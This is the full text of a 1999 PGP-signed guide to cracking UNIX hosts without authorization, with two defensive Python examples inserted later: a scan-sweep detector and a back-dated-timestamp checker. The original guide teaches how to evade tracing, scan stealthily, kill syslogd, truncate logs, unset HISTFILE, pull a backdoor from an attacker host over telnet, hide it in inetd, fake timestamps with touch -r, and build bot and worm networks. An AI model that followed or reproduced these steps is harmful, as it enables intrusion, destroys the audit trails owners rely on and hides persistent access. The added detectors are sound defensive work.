-----BEGIN PGP SIGNED MESSAGE-----

FAQ and Guide to Cracking (c) 1999 by Mixter

Disclaimer: This is a theoretical introduction to cracking, written for informational purposes. It should be seen as an introduction to the methods and strategies used by crackers rather than a howto. The author is not suggesting that anyone perform illegal actions and cannot be held liable for the actions of other individuals who perform any of the actions discussed in this paper, or for any resulting damage.

Introduction:

I am going to describe the methods and strategies used to access various UNIX hosts on the internet without authorization. This guide will not teach you how to hack, nor do you have to be a hacker to use the techniques described here. Hacking means finding your own way to do it, and finding new approaches to accomplishing something. I am only going to supply you with one possible approach to cracking.

I. Prerequisites

Operating System:
You certainly need Unix installed on your home computer. WINDOWS WILL NOT DO IT. I'm not going into details here, but you should take either Net/Open/FreeBSD or Linux, because they are POSIX compliant, suitable for home PCs, and most small network tools will compile on them. If you use Linux [1], you should not use the RedHat, SuSE, or Slackware distributions unless you know how to secure them properly. A local root compromise can be fatal, as it may reveal your identity.

Basic Knowledge:
Get experienced in the use of the following tools. Use the 'man' command, and work with them until you fully understand them. These tools are:

awk cat chmod dd grep gzip kill ln ls mail mknod more mount ping ps sed sort tar ifconfig ipfwadm last head tail gcc cut find ftp less vim nc (netcat) rcp xhost xterm syslogd inetd telnet ssh finger

Security requirements:
You need to make sure that no one can compromise your own host. Check security sites to make sure your daemons (servers) are not exploitable. Do not allow anyone to use your box.
Disable telnet, rlogin, and whatever you don't need yourself. Ideally, you do not run any servers at all while you are attacking other hosts. Consider encrypting directories and/or complete partitions with encrypted file systems, and encrypt emails and files you transfer with PGP. [2]

Account:
For your activities, you require an ISP account with a direct connection, which normally all ISPs provide. You might want to consider not doing any 'cracking' activities from your home at all, in which case you need a fast Linux or BSD shell account, which must not be from a commercial shell provider (esp. those who sell eggdrop and IRC accounts); if you use a university account, you need to make sure that they do not watch / monitor their users. If you use a dialup, make sure that no transparent proxies or network monitors (squid etc.) are being run by your provider. Do a traceroute and check your provider's backbone routers for NIDS (Intrusion Detection), network monitors, proxies, and anything that seems unusual; alternatively, let someone with more knowledge do it.

II. Scanning

Avoiding track-downs:
Where you scan from is up to you. Whatever you do, don't scan from your dialup while using a legit internet account. Everyone who knows your IP is a phone call to your provider away from knowing your identity. If you use fake accounts, avoid using fake or stolen credit cards to make them. Also avoid using 1-800 numbers at all costs, because the 1-800 nodes generally log every calling phone number with access time. Inquire about the ISP you use to make sure it is not in explicit cooperation with federal agencies. Additionally, do not stay longer than 5 (in words: five) hours on the internet without hanging up and reconnecting. Why? If you are logged on, the node has your account associated with your current dynamic IP address for obvious technical reasons, and they also might be able to trace you.
Most nodes will not keep a table of which IP belonged to which account once they have disconnected, especially at huge ISPs where this would take large additional resources. I advise against traversing through WinGate and SOCKS servers, because they give you a false feeling of safety. Often, these servers log every access, and sometimes they are put up by federal agencies themselves. You should ideally relay your connections through a server you have root, hence full control, on, using datapipe, bnc, ssl, or a WinGate/SOCKS server with logging completely disabled.

Stealthy scanning:
A scan that is not noticed is a successful scan. Half-open (SYN) scans are lame, because many daemons will still report a "warning: can't get client address: Connection reset by peer" or similar message; then someone turns on a sniffer or tcplogd and they see who is scanning them. Advanced and recommended scans are NUL (TCP packet without any flags), XMAS (ack/syn/rst probe), and Maimon scans, which can be done with nmap [3]. If you use connect() scans, which are much more reliable, then use lscan, and get the version info. This generally makes the most sense because you have to get the daemons' versions anyway to see if they are exploitable.

Play dead:
As you scan, I strongly recommend disabling every single service on the machine you're scanning from and setting packet filtering rules. This will fool the hosts being scanned into thinking your host is down and the scan is spoofed. A few things you should disable:

* Inetd (identd, finger, ftp, telnet)
* All INCOMING TCP connection requests (ipfwadm: -y flag)
* ICMP Timestamp, Echo reply, Query (ICMP types 8/13/15/17)
* UDP traceroute queries (UDP port range 33400-33500)

Also note that -deny is better than -reject, which would send an ICMP unreachable packet back instead of keeping totally silent.

Non-sequential scanning:
This is important: Use non-sequential scanning to avoid intrusion detection systems.
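The evasion techniques in this section (stealth flag combinations, playing dead, and scattering the target order) all aim at detectors that key on the destination subnet. Seen from the defender's side, the counter is to key on the source instead: count how many distinct destination hosts one source touches within a time window, in whatever order they arrive. The following is an added example for illustration, not code from Mixter's guide. The log format (epoch seconds, source, destination, port) and the sample traffic are constructed for the example; the window and threshold values are assumptions to tune for a real sensor.

```python
"""Sweep detector keyed on the source, not the target order.

Added example for illustration; not code from the guide. The input is a
constructed, simplified connection log with one event per line:
    <epoch seconds> <src ip> <dst ip> <dst port>
Adapt parse() to whatever your sensor actually emits.
"""
from collections import defaultdict, deque

WINDOW = 60      # seconds of history kept per source (assumed value)
THRESHOLD = 10   # distinct destination hosts that count as a sweep (assumed)


def parse(line):
    """Split one constructed log line into (ts, src, dst, port)."""
    ts, src, dst, port = line.split()
    return int(ts), src, dst, int(port)


def find_sweepers(lines, window=WINDOW, threshold=THRESHOLD):
    """Return {src: timestamp} for every source that touched at least
    `threshold` distinct destination hosts within any `window`-second span.
    The order of the destinations is irrelevant, so 1.1.1.1, 1.1.2.1, ...
    is caught just like 1.1.1.1, 1.1.1.2, ..."""
    recent = defaultdict(deque)   # src -> deque of (ts, dst), oldest first
    flagged = {}
    for line in lines:
        ts, src, dst, _port = parse(line)
        hist = recent[src]
        hist.append((ts, dst))
        # drop events that fell out of the window (input is time-ordered)
        while hist and ts - hist[0][0] > window:
            hist.popleft()
        if src not in flagged and len({d for _, d in hist}) >= threshold:
            flagged[src] = ts
    return flagged


def build_sample_log():
    """Constructed sample traffic, not a real capture:
    a) 10.0.0.5 sweeps 1.1.x.1 with the third octet scrambled, one host
       every 3 s;
    b) 10.0.0.9 is an ordinary mail client hitting one host repeatedly;
    c) 10.0.0.7 sweeps the same hosts but only one every 30 s."""
    lines = []
    scrambled = [7, 2, 11, 4, 9, 1, 12, 6, 3, 10, 5, 8]
    for i, x in enumerate(scrambled):
        lines.append(f"{1000 + 3 * i} 10.0.0.5 1.1.{x}.1 110")
    for i in range(20):
        lines.append(f"{1000 + 2 * i} 10.0.0.9 1.1.1.25 110")
    for i in range(12):
        lines.append(f"{1000 + 30 * i} 10.0.0.7 1.1.{i + 1}.1 110")
    return sorted(lines, key=lambda l: int(l.split()[0]))


if __name__ == "__main__":
    for src, ts in find_sweepers(build_sample_log()).items():
        print(f"sweep from {src} detected at t={ts}")
```

With the default 60-second window only the fast scattered sweep (10.0.0.5) is reported, at the moment its tenth distinct host is touched; the mail client never exceeds one destination, and the slow sweeper (10.0.0.7) stays under the threshold. That is the trade-off to keep in mind: widening the window (find_sweepers(log, window=400)) catches the slow one too, at the cost of more state kept per source.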
An IDS or NIDS is installed on a gateway or router and monitors unusual traffic to certain ports. If you scan 1.1.1.1, 1.1.1.2 .. 1.1.1.255, 1.1.2.1 etc., an intrusion detection system can detect your scan against 1.1.1.*. Instead, scan like this: 1.1.1.1, 1.1.2.1 .. 1.1.255.1, 1.1.1.2 ... You get the point.

What to scan:
Most crackers resolve a top-level domain like .com or .net, or a country like .ee, .se, .ch etc., using z0ne or axfr from ADM [4], or by using a simple recursive shell script. 'host -l domain' will not do for a scan, because you'll miss all the subnets that way, and there are plenty of them. However, I'd rather suggest scanning complete IP blocks. Depending on your greed, you can either scan a class B (1.1.*.*) or class A (1.*.*.*) network. You might wish to obtain some information about your targets first. To do this, you can query whois.arin.net, the registration center for IP addresses. Let's say you want to scan 192.168.*.* and you want to know who owns that IP block. Type:

whois -h whois.arin.net 192.168.0.0
or
whois 192.168.0.0@whois.arin.net

and you get a short description of the owners of that netblock. If arin.net doesn't find any information, don't scan it, because the IPs are probably not yet in use. Some info on the 'whois' results...

Maintained by RIPE.NET  = European (no, uk, ch, at, de, se, dk, etc.)
Maintained by APNIC.NET = Asian (id, kr, za, ee, tr, li, kh, etc.)
Maintained by NIC.xxx   = Belonging to country xxx

Finding vulnerable hosts:
The first rule of scanning is: never delete your scan logs. If you think you are completely done with evaluating your logs, then compress, encrypt and store them; don't delete them. New security vulnerabilities will be found sooner or later, and then you won't have to scan it all again. From my experience, the vulnerability scanners are almost all bullshit; you don't need them. Use grep and awk to extract the IP numbers from your scan logs, like this...
grep "QPOP" port110.log | grep "(version 2.2)" | awk '{print $1}' > 0wn.txt

(presuming that your scanner logs like this: "- ")

There are a couple of cases where you need an additional scan to find vulnerable versions, which are:

Buggy Daemon      Scanner                                  Scans for...
wu-ftp BETA-18    wuftpscan/ben (private)                  Writable dir
portmap           rpcinfo -p (unix tool)                   Portmap version
ttdbserver        rpcinfo                                  ttdb version
rstatd            statdscan                                rstatd version
mountd            mountdscan (rootshell)                   mountd/nfs version
bind              binfo-udp (rootshell), nscan (my site),  bind version
                  mbind (private)

III. Rooting

Let's think about the first commands you issue. They should:

1. Discreetly remove traces of the root compromise
2. Gather some general info about the system
3. Make sure you can get back in
4. Disable or patch the vulnerable daemon(s)

Here are my suggestions...

1. killall -9 syslogd klogd - pesky loggers! Only few admins will notice if they get turned off. Now you can act freely. Copy secure.1 and messages.1 from /var/log over secure and messages. Normally, these logs are the only ones with the intruder's IP and traces of a root compromise in them. If *.1 doesn't exist, truncate the files. Also, 'unset HISTFILE' is important. Nobody does 'unset HISTFILE', thus leaving a .bash_history in /var/named or even /. Very unprofessional :).

2. uname -a, w, last -10, cat /etc/passwd /etc/inetd.conf... Inform yourself about how frequently the system is being maintained and administrated, and whether the logfiles are being analyzed.
* Look how many people have access to it (/etc/passwd) - the more the better for you (keeps attention away from you).
* Look if the system is already backdoored!! You might want to remove other backdoors.
* Look for a loghost or snmp (dangerous because you can't manipulate the logs on a far-away loghost).
Watch out for *logd, sniffers, netmons etc. before you do anything great on the host. If you are paranoid, traceroute the host, and see if non-routers are before that host (probably IDS, loghost, sniffer, etc).

3.
This is important: DON'T MANIPULATE THE SYSTEM CONFIGURATION! DOH! It is too easy to detect you if you add yourself to /etc/passwd, or open a port by manipulating inetd.conf. Let me tell you that root kits and /bin/login trojans are the first things any sane admin will watch for. Install a nice stealthy port backdoor. My approach to uploading files is doing:

(on your box)
$ uuencode -m backdoor.c backdoor.c | less

(on the target box)
uudecode
# cc -o backdoor backdoor.c

A nice different method is putting a daemon on your own box, on port 666, that spits out the source code when someone telnets to it, so you can do

telnet ppp-42.haxor.net 666 > backdoor.c

As I said, make sure you can get back in. If the box you rooted has an uptime of more than 300 days or so, you might consider not installing the backdoor for startup. Instead, kill the vulnerable daemon, and when the host restarts, come back using an exploit. Normally, you can replace a lame daemon that nobody uses with your backdoor. Look at inetd.conf to see what daemons are active. A safe bet is in.talkd, which is often activated but seldom ever used. So, when you want to re-activate your backdoor, talk root@0wned.host.com for a second, and your backdoor is running. You can also add /path/to/backdoor to /root/.profile, but it is a bit riskier than the inetd backdoor method.

4. Subscribe to bugtraq or the CIAC security list, or look at rootshell, to see what you need to do to patch your buggy stuff. If RPM is installed you can try

rpm -U ftp://ftp.cdrom.com/rightdir/daemon.rpm

If not, use ncftp to fetch the file anonymously, because it doesn't need user interaction. If you want, add an additional backdoor in your "patched" server. QPOP 2.53 even supports this itself. For all files you replace, you should modify the time stamps, which won't help if the admin uses tripwire or cksum, but will if the admin is, like most admins, a complete lamer that does 'find / -ctime' to scan for trojans and thinks he knows his job.
:P

To modify timestamps, you do a simple:

touch -r /bin/bash /path/to/your/trojan

This will copy the exact date/time info from /bin/bash over your freshly added trojan. Voila! The alternative to all this, for lazy people, is to add an ipfwadm rule that prevents traffic from the outside (-W eth0) to the ports with the buggy daemons, and to add that command to an rc.d script as well. Bind doesn't need TCP port 53 for anything except zone transfers and the RoTShB/ADM bind exploits. It works fine with 53/tcp firewalled. But be aware that this might get you detected, let's say if you disable port 110 or 143 on an ISP's central mail exchange server...

About your backdoor:
Port > 10000 is strongly recommended; also a backdoor using UDP, ICMP, or even something as unusual as raw IP is very useful. People that bind /bin/sh to a port are idiots, because they open that host to everyone, letting in sniffers and probably other people who may damage the host seriously. Make sure to password protect everything that runs as root. Use a password of a minimum length of 8 characters, because you have no way of detecting a brute force attack. For the C programmers, let me say, listen(sockfd,1). Maybe 2 connections, but not more. For comfort, you can add some stuff you want to occur on each successful backdoor login, like system("w"), system("killall -9 syslogd klogd"), or whatever. If you want a front-end backdoor with some integrated functions, try gateway [5].

IV. UTILIZING COMPROMISED SYSTEMS

About your activities:
Do what you desire, but never disregard stealthiness. If you stop checking log files and processes, or start something like 'ping -s 1024 -f cert.org' un-stealthed, it is, depending on the admin, a matter of hours or days until you lose the host.
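The touch -r trick above resets atime and mtime, but the utime() call behind touch cannot set ctime: the kernel stamps ctime with the current time on every inode change, the touch itself included. That is why the text expects tripwire or cksum to catch it, and it also hands an admin a cheap first pass that does not need a baseline. The following is an added example, not code from the guide: it walks a tree and lists regular files whose ctime is far newer than their mtime, and demonstrates the check on two constructed files in a temporary directory, one of which has its mtime copied from a year-old reference the way touch -r does. The one-hour skew threshold and the file names are assumptions.

```python
"""Flag files whose mtime looks back-dated relative to ctime.

Added example, not code from the guide. utime() (what `touch -r` uses)
sets atime and mtime only; ctime is always set to 'now' by the kernel on
any inode change, so a freshly planted file with an old mtime shows a
large ctime - mtime gap.
"""
import os
import shutil
import stat
import tempfile
import time

MIN_SKEW = 3600   # seconds; assumed threshold, tune for the environment


def skewed_files(root, min_skew=MIN_SKEW):
    """Return [(path, mtime, ctime)] for regular files under `root` whose
    ctime is more than `min_skew` seconds newer than their mtime."""
    hits = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)           # lstat: do not follow symlinks
            except OSError:
                continue                      # vanished or unreadable, skip
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_ctime - st.st_mtime > min_skew:
                hits.append((path, st.st_mtime, st.st_ctime))
    return hits


def demo():
    """Constructed scenario: two files in a temp dir, one of them given a
    year-old mtime via os.utime(), which is exactly what `touch -r` does.
    Returns the set of base names the check reports."""
    root = tempfile.mkdtemp(prefix="skewdemo-")
    try:
        honest = os.path.join(root, "honest.bin")
        planted = os.path.join(root, "planted.bin")
        for p in (honest, planted):
            with open(p, "w") as f:
                f.write("placeholder content\n")
        year_ago = time.time() - 365 * 86400
        # atime and mtime are back-dated; ctime is set to now by the kernel
        os.utime(planted, (year_ago, year_ago))
        return {os.path.basename(p) for p, _m, _c in skewed_files(root)}
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print("reported:", demo())   # expected: {'planted.bin'}
```

Expect legitimate hits as well: tar and most package managers restore the archive's mtime on extraction, so everything installed recently shows the same skew. The value of the check is in narrowing the candidate set, and in pairing it with a known-good checksum baseline, the tripwire/cksum route the text itself concedes works; a binary whose mtime matches /bin/bash to the second while its ctime is from last night is still the tell.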
Most of the time, losing a host means you cannot get access again, and the admins will examine their system with extreme scrutiny; if they are too lame, they might contact some external security experts or even the Computer Emergency Response Team. Never do serious damage to the system when you don't have to - and trust me, you won't. Damaging a system by altering vital system files, replacing frequently-used programs or even destroying information is unintelligent, will not do you any good, and will maybe assist you in getting new enemies. And it is trivial to mention: do not deface web sites...

World domination:
As the number of systems you control increases, you might want some kind of easy remote control, utilization for attacks, and detection of detection of your activities. You can install newnick bots or eggdrop bots with fancy scripts which can be controlled through IRC to make life easier (make sure to sit and think before you consider doing anything big with them on IRC!). You can make your own inter-linked network of root systems, in which case you need to start programming because no one will release such a program to the public. :) You can make little packages with spoofing flooders, smurf and the like, if you decide to become a packet warrior (then again, it won't help you accomplish anything but getting IRC channels or shutting down government sites...). Alternatively, you can use every root you get to scan new netblocks, and have the information mailed to you or whatever. You can make an internet worm like ADMw0rm [4], B4b0w0rm, or the millennium worm (the last 2 are private), and install them on your roots; make sure it is well constructed and bug-free...
If you are a creative person, you can make them scan large amounts of ISP dialup netblocks for Back Orifice, NetBus server, Backdoor-G, and whatnot, and write something that controls their computers to spread more trojans, send their mail to you, get their passwords, flood, scan, invade their private lives... no wait, that's the government's job.

V. YOUR PRESENCE ON THE NET

Smart behavior and senseless behavior:
What you do besides cracking mostly happens on IRC. IRC should be seen as a tool for getting in touch with other skilled persons and exchanging thoughts and information. To avoid wasting your time and skills, and possibly getting busted, here are some things which you SERIOUSLY should not be doing:

1) Warez. Stay away from warez, it is a waste of time. Warez ruins productive people and makes software expensive. Besides the moral bullshit, you can always get something you really need (#1 net game, enterprise application etc.), and you don't need much, trust me. Almost everything security / hacking related is free. Joining a warez group gets you a) a lot of vhosts with lame names, b) idiotic friends, c) on the FBI blacklist - nothing besides that.

2) 'IRC War'. Groups like core, chrome, enforce, conflict, takeover, madcrew, phorce, tnt, etc. etc. who call themselves 'War' groups are good for nothing. Why would you want to be a member of a group that attacks other similar groups and channels - it is comparable to the mafia - almost as violent and dangerous, except that you don't get rich. If you think you need 'WarGroup' support for taking a channel with reasonable security, you are lame or you can't take a challenge. Think again.

3) Hacking related groups. Inform yourself about what happened to gH or 'global Hell'. Most of these groups do the exact opposite of what is advised in this paper. If you get an offer to join l0pht, cDc, MOD, thc, or ADM, take it because you'll learn a lot; all other groups are not worth your time.
4) IRC operators, BOFH, admins of big systems. Stay away from them until you are confidently prepared and willing to fight with them. Blindly attacking them can also be a waste of time, but it can also become a reasonable challenge.

Keep up to date:
The more you advance in cracking skills, or even start to consider hacking, programming or developing, the more the web will probably become the part of the net you use least. Visit your favorite security related sites frequently, and make sure to keep up to date about security breaches, law enforcement, exploits, and changes in the methods of crackers and admins. My bookmarks certainly include Packetstorm security [6] and GeekGirl [7].

URLS:
[1] ftp://ftp.cdrom.com/pub/linux/distributions
[2] http://members.xoom.com/i0wnu/pgp.html
[3] http://www.nmap.org
[4] ftp://ftp.adm.isp.at/pub/ADM
[5] http://members.xoom.com/i0wnu/gateway.tgz
[6] http://www.genocide2600.com/~tattooman
[7] http://www.geek-girl.com

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBN2VcO7dkBvUb0vPhAQGtPgf+Iglo6ZZh7sF/WbeteyTGYaw0D9AJR4IH
A7hBo9AUwm3ZO7gDhdzLvDlOjXiMxhhJ2Jey/Y6M5Bb5LvZf8tK4EoUIF/UA8ifU
E6fd18zBDJep2LFaHyzXegA5oCWCYjpb3ZcFtbtpcA2He1hU85QUknOAHZ6lJyiV
JJZziWnXRkAcmRpzbLkTgVydisgugNwfYs9OJH/GNMCKQzeKB+MJrQ7wNlNOdV6T
7u4Jt1q1hW7P5p3xi6ETS196qQ7NO+46FqTEShk6HC+wl7EDwv8VTbz5lEGjBVXz
JEiIIAM5YfbGRbu65fTIlhI0u5N8OxKkX74HOGcBsInQlzuCNq6aMA==
=o8mY
-----END PGP SIGNATURE-----